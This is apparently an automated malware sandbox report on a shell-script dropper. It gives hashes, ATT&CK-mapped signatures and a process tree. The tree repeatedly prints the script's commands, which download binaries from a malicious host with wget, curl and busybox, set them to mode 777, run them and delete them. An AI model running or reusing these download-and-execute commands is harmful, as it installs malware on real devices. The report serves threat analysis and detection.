50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a

Analysis

max time kernel
83s
max time network
85s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
15/10/2024, 01:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh
Size

10KB
MD5

ec466edc6c1e9e990a5ec3a4f5dc57ec
SHA1

163a1c64d09a52b82963878c6f77cc74cfdabd10
SHA256

50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a
SHA512

c4d304bb42e3c786e9d2eaf7eeb196d6756ce4aa6266bbc6af0ab152926100a5b86a3ca1d8e38cd7c77455be88fb5d2ab952ffd289c0a2a89c8b3c17c90fca88
SSDEEP

96:YLn4L5RnO+Fi69dHdbde7zJUNNTA55RAYL8AyLGCGaG0LXiddhkaS7LokkLEIbxM:LWc2GCNV0LXQoMvXNV0LXWnCx

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
870	chmod
809	chmod
834	chmod
884	chmod
926	chmod
975	chmod
736	chmod
863	chmod
802	chmod
1003	chmod
989	chmod
891	chmod
919	chmod
940	chmod
968	chmod
898	chmod
905	chmod
933	chmod
982	chmod
954	chmod
961	chmod
856	chmod
877	chmod
912	chmod
947	chmod
996	chmod
751	chmod
782	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
981	busybox
831	busybox
887	wget
918	busybox
894	wget
943	wget
964	wget
965	curl
979	curl
852	busybox
873	wget
922	wget
972	curl
740	curl
929	wget
932	busybox
805	wget
825	curl
967	busybox
901	wget
971	wget
978	wget
735	busybox
777	busybox
881	curl
936	wget
960	busybox
986	curl
708	wget
841	wget
846	curl
806	curl
808	busybox
1002	busybox
883	busybox
890	busybox
930	curl
951	curl
985	wget
756	wget
869	busybox
880	wget
1000	curl
876	busybox
902	curl
946	busybox
764	curl
790	wget
862	busybox
939	busybox
953	busybox
958	curl
974	busybox
988	busybox
888	curl
904	busybox
909	curl
999	wget
739	wget
866	wget
908	wget
944	curl
995	busybox
799	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls	curl
File opened for modification	/tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi	curl
File opened for modification	/tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7	curl
File opened for modification	/tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5	curl
File opened for modification	/tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1	curl
File opened for modification	/tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ	curl
File opened for modification	/tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB	curl
File opened for modification	/tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq	curl
File opened for modification	/tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls	curl
File opened for modification	/tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76	curl
File opened for modification	/tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA	curl
File opened for modification	/tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7	curl
File opened for modification	/tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi	curl
File opened for modification	/tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA	curl
File opened for modification	/tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1	curl
File opened for modification	/tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi	curl
File opened for modification	/tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh	curl
File opened for modification	/tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5	curl
File opened for modification	/tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB	curl
File opened for modification	/tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi	curl
File opened for modification	/tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi	curl
File opened for modification	/tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76	curl
File opened for modification	/tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA	curl
File opened for modification	/tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA	curl
File opened for modification	/tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi	curl
File opened for modification	/tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh	curl
File opened for modification	/tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ	curl
File opened for modification	/tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq	curl

/tmp/50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh
/tmp/50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh
1⤵
PID:704
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:706
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  - System Network Configuration Discovery
  PID:708
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:728
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  - System Network Configuration Discovery
  PID:735
- /bin/chmod
  chmod 777 MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  - File and Directory Permissions Modification
  PID:736
- /tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  ./MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  - Executes dropped EXE
  PID:737
- /bin/rm
  rm MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  PID:738
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  - System Network Configuration Discovery
  PID:739
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:740
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  PID:745
- /bin/chmod
  chmod 777 59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  - File and Directory Permissions Modification
  PID:751
- /tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  ./59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  - Executes dropped EXE
  PID:752
- /bin/rm
  rm 59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  PID:755
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  - System Network Configuration Discovery
  PID:756
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:764
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  - System Network Configuration Discovery
  PID:777
- /bin/chmod
  chmod 777 4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  - File and Directory Permissions Modification
  PID:782
- /tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  ./4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  - Executes dropped EXE
  PID:784
- /bin/rm
  rm 4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  PID:788
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  - System Network Configuration Discovery
  PID:790
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:799
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  PID:801
- /bin/chmod
  chmod 777 wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  - File and Directory Permissions Modification
  PID:802
- /tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  ./wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  - Executes dropped EXE
  PID:803
- /bin/rm
  rm wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  PID:804
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  - System Network Configuration Discovery
  PID:805
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:806
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  - System Network Configuration Discovery
  PID:808
- /bin/chmod
  chmod 777 eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  - File and Directory Permissions Modification
  PID:809
- /tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  ./eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  - Executes dropped EXE
  PID:810
- /bin/rm
  rm eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  PID:813
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  PID:814
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:825
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  - System Network Configuration Discovery
  PID:831
- /bin/chmod
  chmod 777 B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  - File and Directory Permissions Modification
  PID:834
- /tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  ./B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  - Executes dropped EXE
  PID:836
- /bin/rm
  rm B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  PID:839
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - System Network Configuration Discovery
  PID:841
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:846
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - System Network Configuration Discovery
  PID:852
- /bin/chmod
  chmod 777 GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  ./GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - Executes dropped EXE
  PID:857
- /bin/rm
  rm GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  PID:858
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  PID:859
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:860
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - System Network Configuration Discovery
  PID:862
- /bin/chmod
  chmod 777 OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - File and Directory Permissions Modification
  PID:863
- /tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  ./OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - Executes dropped EXE
  PID:864
- /bin/rm
  rm OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  PID:865
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - System Network Configuration Discovery
  PID:866
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:867
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - System Network Configuration Discovery
  PID:869
- /bin/chmod
  chmod 777 g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - File and Directory Permissions Modification
  PID:870
- /tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  ./g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - Executes dropped EXE
  PID:871
- /bin/rm
  rm g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  PID:872
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - System Network Configuration Discovery
  PID:873
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:874
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - System Network Configuration Discovery
  PID:876
- /bin/chmod
  chmod 777 zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - File and Directory Permissions Modification
  PID:877
- /tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  ./zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - Executes dropped EXE
  PID:878
- /bin/rm
  rm zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  PID:879
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - System Network Configuration Discovery
  PID:880
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:881
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - System Network Configuration Discovery
  PID:883
- /bin/chmod
  chmod 777 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - File and Directory Permissions Modification
  PID:884
- /tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  ./28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - Executes dropped EXE
  PID:885
- /bin/rm
  rm 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  PID:886
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - System Network Configuration Discovery
  PID:887
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:888
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - System Network Configuration Discovery
  PID:890
- /bin/chmod
  chmod 777 TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - File and Directory Permissions Modification
  PID:891
- /tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  ./TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - Executes dropped EXE
  PID:892
- /bin/rm
  rm TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  PID:893
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  - System Network Configuration Discovery
  PID:894
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:895
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  PID:897
- /bin/chmod
  chmod 777 RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  - File and Directory Permissions Modification
  PID:898
- /tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  ./RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  - Executes dropped EXE
  PID:899
- /bin/rm
  rm RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  PID:900
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  - System Network Configuration Discovery
  PID:901
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:902
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  - System Network Configuration Discovery
  PID:904
- /bin/chmod
  chmod 777 zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  - File and Directory Permissions Modification
  PID:905
- /tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  ./zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  - Executes dropped EXE
  PID:906
- /bin/rm
  rm zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  PID:907
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - System Network Configuration Discovery
  PID:908
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:909
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  PID:911
- /bin/chmod
  chmod 777 GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - File and Directory Permissions Modification
  PID:912
- /tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  ./GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  - Executes dropped EXE
  PID:913
- /bin/rm
  rm GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  2⤵
  PID:914
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  PID:915
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:916
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - System Network Configuration Discovery
  PID:918
- /bin/chmod
  chmod 777 OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - File and Directory Permissions Modification
  PID:919
- /tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  ./OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  - Executes dropped EXE
  PID:920
- /bin/rm
  rm OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  2⤵
  PID:921
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - System Network Configuration Discovery
  PID:922
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:923
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  PID:925
- /bin/chmod
  chmod 777 g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - File and Directory Permissions Modification
  PID:926
- /tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  ./g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  - Executes dropped EXE
  PID:927
- /bin/rm
  rm g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  2⤵
  PID:928
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - System Network Configuration Discovery
  PID:929
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:930
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - System Network Configuration Discovery
  PID:932
- /bin/chmod
  chmod 777 zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - File and Directory Permissions Modification
  PID:933
- /tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  ./zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  - Executes dropped EXE
  PID:934
- /bin/rm
  rm zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  2⤵
  PID:935
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - System Network Configuration Discovery
  PID:936
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:937
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - System Network Configuration Discovery
  PID:939
- /bin/chmod
  chmod 777 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - File and Directory Permissions Modification
  PID:940
- /tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  ./28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  - Executes dropped EXE
  PID:941
- /bin/rm
  rm 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  2⤵
  PID:942
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - System Network Configuration Discovery
  PID:943
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:944
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - System Network Configuration Discovery
  PID:946
- /bin/chmod
  chmod 777 TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - File and Directory Permissions Modification
  PID:947
- /tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  ./TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  - Executes dropped EXE
  PID:948
- /bin/rm
  rm TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  2⤵
  PID:949
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  PID:950
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:951
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  - System Network Configuration Discovery
  PID:953
- /bin/chmod
  chmod 777 RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  - File and Directory Permissions Modification
  PID:954
- /tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  ./RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  - Executes dropped EXE
  PID:955
- /bin/rm
  rm RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  2⤵
  PID:956
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  PID:957
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:958
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  - System Network Configuration Discovery
  PID:960
- /bin/chmod
  chmod 777 zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
